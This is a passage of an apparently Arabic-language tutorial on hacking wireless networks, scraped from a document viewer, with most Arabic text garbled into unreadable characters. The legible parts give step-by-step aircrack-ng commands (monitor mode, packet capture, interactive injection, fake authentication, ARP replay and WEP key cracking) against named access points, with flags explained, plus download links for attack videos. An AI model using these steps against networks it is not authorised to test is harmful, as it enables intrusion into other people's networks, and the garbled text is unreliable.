RTL8180 YES YES UNSTABLE (driver patching required)
RTL8187L UNTESTED YES (driver patching required to view power levels)
YES (driver patching recommended for injection and required to view power levels)
TI (ACX100/ACX111)
NO YES YES (driver patching required)
ZyDAS 1201 NO YES Partially (See patch for details)
ZyDAS 1211[B] NO YES YES Others (Marvel...) NO UNKNOWN NO
![Page 17: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/17.jpg)
http://www.t0010.com ����� ا��رق ا���و���
17
�����a���'�א�� �����L�� �
kernel headers
gcc
��_�&�k��z�1�dY@�45�����������8qא�"���qV�5�(��q� �0�&(.����±�mא�iUא���()�"��V�5�������א���.)&��א��8�����zq�1��q�*����q&(.���|M�,�5�q��Debian����������������������������������������������
Ubuntu , Xubuntu , Knoppix ]�[�8������א�Sא����("�����E�s ��אS"א�(��W� �
sudo apt-get install build-essential
�rw5!��#��8א��]� �א������KK8א��!�����Wא� �
wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz tar -zxvf aircrack-ng-0.9.1.tar.gz cd aircrack-ng-0.9.1 make make install
�]��!������5���]��!������5���]��!������5���]��!������5������ Aircrack
���(�k]�����א��!�a�_א)W���VE�<"�8J�*���,�)Y����)*1��e"�&��KK���)7-א�������a���k)���א���_��(����J�*���]� ���e�5��א����)Y���"K� �
![Page 18: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/18.jpg)
http://www.t0010.com ����� ا��رق ا���و���
18
S���U�����!���3א���wget� �
wget http://pcmcia-cs.sourceforge.net/ftp/contrib/wireless_tools.28.tar.gz
���S���0 ~p�c�!tar� �
tar xvfz wireless_tools.28.tar.gz
���S����)���z�1�4Z)!���~א���ce�)&�cd
cd wireless_tools.28
���Sא�{� !���make� �
make
���i��!����*���7א��!���S���] make install � �� �
make install
������������qqV*��TOaqq5��qq���M�{qq"א ��TאRSא��=qq<��qq1� � ��qq��cqq!M�2qq���J���(א�qqא��U��qq���qq�5#���qq*6א��=qq�<"�iwconfig �"�iwlist �Oaא��"���F��V��@�R)7���*��K�E� �
���5�����5�����5�����5��wireless tools _אOa5��V*��)����!�`�E"�_א)W������_אOa5��V*��)����!�`�E"�_א)W������_אOa5��V*��)����!�`�E"�_א)W������_אOa5��V*��)����!�`�E"�_א)W������
![Page 19: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/19.jpg)
http://www.t0010.com ����� ا��رق ا���و���
19
�̀ �qE����q�Sא�i)Y��q!�iwlist ���F���������qא���q5���rM��q�wireless tools ����4q����4q���v�q@�|=qא������Sא�iא)Y�Eא� � ����E�� �
�23�����jא�!� �k�z�1Sא�[�sp��65>��"א�'R)�"���6��O����!�a���6"א���T)א�"�,���@�'�����S����Kא�rא-�6Vא-&�� �
c�������Xא��'���D�45א��d3ec�������Xא��'���D�45א��d3ec�������Xא��'���D�45א��d3ec�������Xא��'���D�45א��d3e� �� �� �� ���������scan all network around� �� �� �� �
bt ~ # iwlist ath0 scan ath0 Scan completed : Cell 01 - Address: 00:14:7F:1F:27:6D ESSID:"SpeedTouch433793" Mode:Master Frequency:2.462 GHz (Channel 11) Quality=60/94 Signal level=-35 dBm Noise level=-95 dBm Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s 24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s 12 Mb/s; 48 Mb/s Extra:bcn_int=100 Extra:wme_ie=dd180050f2020101880003a4000027a4000042435e0062322f00 Cell 02 - Address: 00:18:39:24:5C:F8 ESSID:"linksys" Mode:Master Frequency:2.427 GHz (Channel 4) Quality=50/94 Signal level=-45 dBm Noise level=-95 dBm Encryption key:off Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s 48 Mb/s; 54 Mb/s Extra:bcn_int=100 Extra:wme_ie=dd180050f2020101030003a4000027a4000042435e0062322f00
![Page 20: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/20.jpg)
http://www.t0010.com ����� ا��رق ا���و���
20
4��4��4��4����������U��iא)Y�Eא�[�;)����;�c��5�4(�A�c��1�����R�Monitor�N:�9א-�������Aircrackא���`�E��u�-Kא�؟�)����"5,� �
�،� ��r�q�(��i.$�Monitor modeא��q�"� sniffing ����zq�1�'�q���qj��|'�א���)q���r�D15���������q"א��א+��R�-א�z�1�r��(�vא��.�Vא���'�]�א��c�D�����N"MManaged���J�5S���N�7�$���±�Z�R�-א�א=<���*(� �
� ����'�5�4(�3���,��(�k�)W�(q��Monitor Mode�W� �
�9"Sא� �)���אW�{(�k��1�command lineK�� ����!�aא� �)���א�W�z6���U����{(�k��1�airmon-ng ���U�� ��8����Aircrack�
�R�-א�z�1�r��(�vא�א���'��c�D�����N"M�Managed ��4a�����!�5u�_����E�K� �
bt ~ # iwconfig ath0 ath0 IEEE 802.11b ESSID:"" Nickname:"" Mode:Managed Channel:0 Access Point: Not-Associated Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-98 dBm Noise level=-98 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
q��'�3)�4א������,���Monitor Modeא�v�D��i��M�`�E�rwא� �)� ����WאS"�9א� �)�� �
�{(�k��1command line �8&��،،،�����&�א� �
bt ~ # ifconfig ath0 down bt ~ # wlanconfig ath0 destroy bt ~ # wlanconfig ath0 create wlandev wifi0 wlanmode monitor ath0 bt ~ # ifconfig ath0 up bt ~ # iwconfig ath0 ath0 IEEE 802.11b ESSID:"" Nickname:"" Mode:Monitor Frequency:2.412 GHz Access Point: 00:0F:B5:EA:2F:AF
��R�-�4א���'�:�9א(�A��R�-�4א���'�:�9א(�A��R�-�4א���'�:�9א(�A��R�-�4א���'�:�9א(�A[ Monitor Mode ]� �� �� �� �
![Page 21: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/21.jpg)
http://www.t0010.com ����� ا��رق ا���و���
21
Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-98 dBm Noise level=-98 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
���!�aא� �)���א�W� ��z6���U����{(�k��1airmon-ng ���U�� ��8����Aircrack�8&��،،����&�א� �
� �bt ~ # airmon-ng stop ath0 Interface Chipset Driver wifi0 Atheros madwifi-ng eth0 Centrino b/g ipw2200 ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed) bt ~ # airmon-ng start wifi0
Interface Chipset Driver wifi0 Atheros madwifi-ng eth0 Centrino b/g ipw2200 ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled) bt ~ # iwconfig ath0 ath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.457 GHz Access Point: Not-Associated Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-94 dBm Noise level=-94 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
�WWWWE�rw�1א�M)�*��5���zא�i�j/א���k�WWWW� �
![Page 22: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/22.jpg)
http://www.t0010.com ����� ا��رق ا���و���
22
4��4��4��4����rM�M)����(�k�[�R�-א�z�1�'א����r��(�rM����i�j/א�Monitor��_��(M"��� ��rM��R)��r���J���(א��א����@�Xא�Vא�#Zא�)(�����K� �
��*(���J�5Sא�z�1�c��@��*(F5�0�e�r��(���)*1�i�j/א�א=<�i)Y��!� ���interactive ��Kא/("�i�j��z6>=א���� �
4�@"�T��e�s�p�����6�i�j/��8>=א�א�������NFZא�*��u�6א��W� �
4qqa����4�Dqqא��[��*�qq@��qq�����Fqq1M�83�qqp����zqq�1�c��qq@�+�qqאqq5S��KK�+$�.�qqVW�)qqW�(�������0qq�e"��qq*(���Jא�����4qq����"M�Oaqq5�x�qqE��qq*6V(��qq���qq���cqq�eא���،����#qqY-א�.�qqVW��qqZwא�+�qq��Fא�"�،��'�qq��k�4qqE�!�vא�arp
request��)qqq(U!�r�Dqqq1�47qqq���ivs�qqq:�9אqqq5S�qqq(�k��qqq1��qqq*(���J}�א����qqq*(Fא-��)qqq���qqq5M� qqq6®"����O�Dqq� �א�&��r�qq���qqא���)qq�!�r�Dqq1��qq�5���cqq�!א�qq��T�qq���O�Dqq��bit�_�qq 64א�(������qq�A�vא�٠٠٠}�٢٥٠
�0q������5���،�T����O�D���_�bit 128"א�(�������A٠٠٠}���٥٠٠ ��0������5���K�� �� �
������9"Sא�i�j/א���(�k������9"Sא�i�j/א���(�k������9"Sא�i�j/א���(�k������9"Sא�i�j/א���(�k���������������������������������������������������������������������������������������������������������������������������� The attack method 1
![Page 23: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/23.jpg)
http://www.t0010.com ����� ا��رق ا���و���
23
airodump-ng – capture packets aireplay-ng - interactive attack modes [ injection packets] aircrack-ng – crack WEP , WPA
airodump-ng)١ (
�U������k��1`�E�K)}�>=|�א��[��V\��"���5����!����א� �
airodump-ng –c 11 –-bssid 00:14:7F:1F:27:6D –w capture ath0
� -c : channel number � --bssid : MAC Address for Access Point � -w : save the file � capture : file name that be save the packet � ath0 : our interface name
![Page 24: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/24.jpg)
http://www.t0010.com ����� ا��رق ا���و���
24
Interactive aireplay-ng )٢(
k��1qqqqq�U����(�i�j<�i)Y����E�z6א����!�'�"���i��!�`�E)}�>=|�א��*interactive� �
aireplay-ng --interactive –b 00:14:7F:1F:27:6D –d FF:FF:FF:FF:FF:FF –m 68 –n 68 –p 0841 –h 00:13:CE:6D:61:59 ath0
� --interactive : attack modes � -b : MAC Address for Access Point � -d : Destination MAC Broadcast � -m 68 : minimum Packet length � -n 68 : maximum Packet length � -p 0841 : Sets the frame control � -h : MAC Address for Client � ath0 : our interface name
![Page 25: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/25.jpg)
http://www.t0010.com ����� ا��رق ا���و���
25
(3) increase the packets
���!)<�q@��qq��4qa���qq���T��qq mא�[�F١�E�����qq���T��q mא�{qq�� ��)qq&�"�_א)qW��qq������qq!�5��q�5��F٢�E�`�qqEא��[���5�����6א.�D��R�(R>(�א���K� �
aircrack-ng )4 (
�U��������א���k��1i��!�`�E���O�D)}�>=|�א� � aircrack-ng –b 00:14:7F:1F:27:6D capture.cap
� -b : MAC Address for Access Point � capture.cap : capture files
![Page 26: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/26.jpg)
http://www.t0010.com ����� ا��رق ا���و���
26
i)Y��qq!i)Y��qq!i)Y��qq!i)Y��qq!�5�)qqW�(�$���)q*1�i�qqj/א�א=qq<��i�qqj/א�א=qq<�z6�qq("��qq*(���J�qq5Sא�zqq�1�c��qq@��qq*(FFake authentication ������ �
� �
�8�������NFZא�*��u�6א��i�j/�4>=א�א�@"�T��e�s�p�����6�W� �
��4a���������������q*(���J�q5Sא�z�1�c��@��*(F5�|M�)W�(�$�4�Dא��[��*�@����&u:�i")qא����"��q�&(�cq�eא�#א�����*(���J�5Sא�z�1�c��@��*(F5�0�eK� �� �
���<�qq!�vא��i�qqj/א�א=qq<�i)Y��qq!�4qqא�J�qq5Sא��c��qq@��qq*(F5�0qq�e��qq!M��qq*(���FK(U���qq��z6�qq(�E��qq��4E�!arp request �9:�J�5S�4א����(���arp replay ���)<�Dq*����1א��V.�א��>����86!�E"
���5���K]�א.8���Z�4�D��R�(Rא� �� �� �
��!�aא��i�j/א���(�k��!�aא��i�j/א���(�k��!�aא��i�j/א���(�k��!�aא��i�j/א���(�k�������������������������������������������������������������������������������������������������������������������������������������������������������������������� The attack method 2
![Page 27: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/27.jpg)
http://www.t0010.com ����� ا��رق ا���و���
27
airmon-ng – switch to monitor mode airodump-ng – capture packets aireplay-ng – attack modes fake authentication aireplay-ng – attack modes arpreplay aircrack-ng – crack WEP , WPA
airodump-ng)١ (
�K���[��V\��"���5����k��1)}�>=|�א�����U�א�v!����א� �
airodump-ng –c 6 –-bssid 00:14:6C:1A:98:8C –w output ath0
� -c : channel number � --bssid : MAC Address for Access Point � -w : save the file � output : file name that be save the packet � ath0 : our interface name
![Page 28: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/28.jpg)
http://www.t0010.com ����� ا��رق ا���و���
28
fake authentication aireplay-ng )٢ (
4E�!"�c��@��*(F5�0�e��!M�06<�!"��*(���J�5S�9א:�'���k�4E�!�0�FZ����'����Kא� � �
aireplay-ng --fakeauth 6000 –o 1 –q 10 –e DataCenter –a 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0
� --fakeauth : attack modes � -o 1 : Send only one set of packets at time � -q 10 : Send keep alive packets every 10 seconds � -e : Name of Access Point � -a : MAC Address for Access Point � -h : our MAC Address Card � ath0 : our interface name
![Page 29: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/29.jpg)
http://www.t0010.com ����� ا��رق ا���و���
29
(3) aireplay-ng arpreplay
`�E�4E�!�arp request ��*(���J�5S�9א:��*��±�mא�}�Rא-���א�,�)Y����K� �
aireplay-ng --arpreplay –b 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0
� --arpreplay : attack modes � -b : MAC Address for Access Point � -h : our MAC Address Card � ath0 : our interface card
![Page 30: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/30.jpg)
http://www.t0010.com ����� ا��رق ا���و���
30
(3) increase the packets
4qqa�����qq���T��qq mא�[��*�qq@��qq��F١�E����qq mא�{qq�� ��)qq&�"�_א)qqW��qq������qq!�5��qq�5���F٣�E�`�qqE��T����qqא��8���Z�R�(R.���5]�א����D�K>(�א� �
![Page 31: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/31.jpg)
http://www.t0010.com ����� ا��رق ا���و���
31
aircrack-ng )4 (
�U��������א���k��1�i��!�`�E��O�D)}�>=|�א� � aircrack-ng –b 00:14:6C:1A:98:8C output.cap
� -b : MAC Address for Access Point � output.cap : capture files
r��!א�=�<"r��!א�=�<"r��!א�=�<"r��!א�=�<"�)���)���)���)���*�V����]�5����)��א!��V*�א!��V*�א!��V*�א!)Y�)������@��vא� �)��,�א-�����5�[���)Y�)������@��vא� �)��,�א-�����5�[���)Y�)������@��vא� �)��,�א-�����5�[���)Y����@��vא� �)��,�א-���"M�'א�����Eא�|S"�J��(א��א�'���@�"M�'א�����Eא�|S"�J��(א��א�'���@�"M�'א�����Eא�|S"�J��(א��א�'���@�"M�'א�����Eא�|S"�J��(א��א�'���@���EM���EM���EM���EM�X�Eא����� �±�7mא�א=V���X�Eא����� �±�7mא�א=V���X�Eא����� �±�7mא�א=V���X�Eא����� �±�7mא�א=V��
�+�����1KKKK��)(|�א$��#"!�8א-��N"M�[�R�Wא����+���1��)(|�א$��#"!�8א-��N"M�[�R�Wא����+���1��)(|�א$��#"!�8א-��N"M�[�R�Wא����+���1��)(|�א$��#"!�8א-��N"M�[�R�Wא�� �� �� �� �
![Page 32: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/32.jpg)
http://www.t0010.com ����� ا��رق ا���و���
32
�*�qq%"�*�qq%"�*�qq%"�*�qq%"��qq(�V!�9:�8!א�qqZ:��*qqE�R�"��qq�"���Dqqא��א�#qqZא�[���qq �8א�qqV�*������qqEFא��'�،��)qqW�(�4qq���4(�k�L�p�-�e�TOa5����eM"����k��&D����K">=א�א�(�{�)&���!� ��]����>=א�א�&���W(א_�" �
� ��������()qq������4qq��5�4�Dqq��}�)qqא�א�=qq<�v�Dqq���qq6��)qq������X�(�qq ��{qq�� ��0qq�e����()qq�e�,qq����)qqW�(
��V���@�Xא��i�j/א��"א���א��=<�z�1��<)oW� �Attack-method 1 ( 124 MB ) http://www.4shared.com/file/24526019/8831b5f1/attack-method1part1.html?dirPwdVerified=630ebe35 50MB http://www.4shared.com/file/24546586/40c72462/attack-method1part2.html?dirPwdVerified=630ebe35 50MB http://www.4shared.com/file/24548769/ada0b720/attack-method1part3.html?dirPwdVerified=630ebe35 24MB
Attack-method 2 ( 113 MB ) http://www.4shared.com/file/24553904/65b4efa0/attack-method2part1.html?dirPwdVerified=24884433 50MB http://www.4shared.com/file/24590482/9b931121/attack-method2part2.html?dirPwdVerified=24884433 50MB http://www.4shared.com/file/24592271/2b86e86d/attack-method2part3.html?dirPwdVerified=24884433 13MB
���� qqtא��א�J�*qq���i�qq\*��0qqW����qqZ:�4qq5��qqא!�8א��zqq*lM��KK���`א#qq�$א�[�_Fqq&e��qq���4"אuא������qq-�0אqq!S�J�*����qqq��0W������c��1K� �
� �����(�qqא�����*��qqE��N�qq�(����qqE"�0qq��1���z�qq%�"��qqא�$��}�qq*א����Dqq(�$�qq<��qq=א��א-* ����Dqq(�"���{qqא"��
���������q<�`Fq��06�67q��zq�1=א�����א� �q������D����9�&"א��8ZS�;�1)א�~��8��qא����0W��M�8!�e��(�&(�@���א������v�qqj*א�"�{qq�e�� ��R�0qq��zqq*lM"א�iא�qqt�4א��א�Dqq����0qqWא�Z:"�+�qq��]�R����x�qqZM�}"،�א���ru�qq���5א�qq!"
��KKKKK"א�������1�iF"���א �
�l�mא�l�mא�l�mא�l�mא� �� �� �� �
![Page 33: HOWTO-Hacking Wireless Networks-Arabia](https://reader034.vdocuments.us/reader034/viewer/2022042601/5528cbf8550346c7688b4932/html5/thumbnails/33.jpg)
http://www.t0010.com ����� ا��رق ا���و���
33
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
��������+�� ��6(�א��6(�א��6(�א��6(�אא����+א����+א����+א��� �� �� �� �
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
١٢�r������L١٤٢٨q<�� �� �
) Sptember 23, 2007(
- ----- ---- --- ---- --- ---- ---- ---
��א����+�א$��#"!�8א����+�א$��#"!�8א����+�א$��#"!�8א����+�א$��#"!��67���67���67���67�����8 �� �� �� �----------------------------------------------------------------
aLT3rEQ$Hacker ------------------------------------------------------------------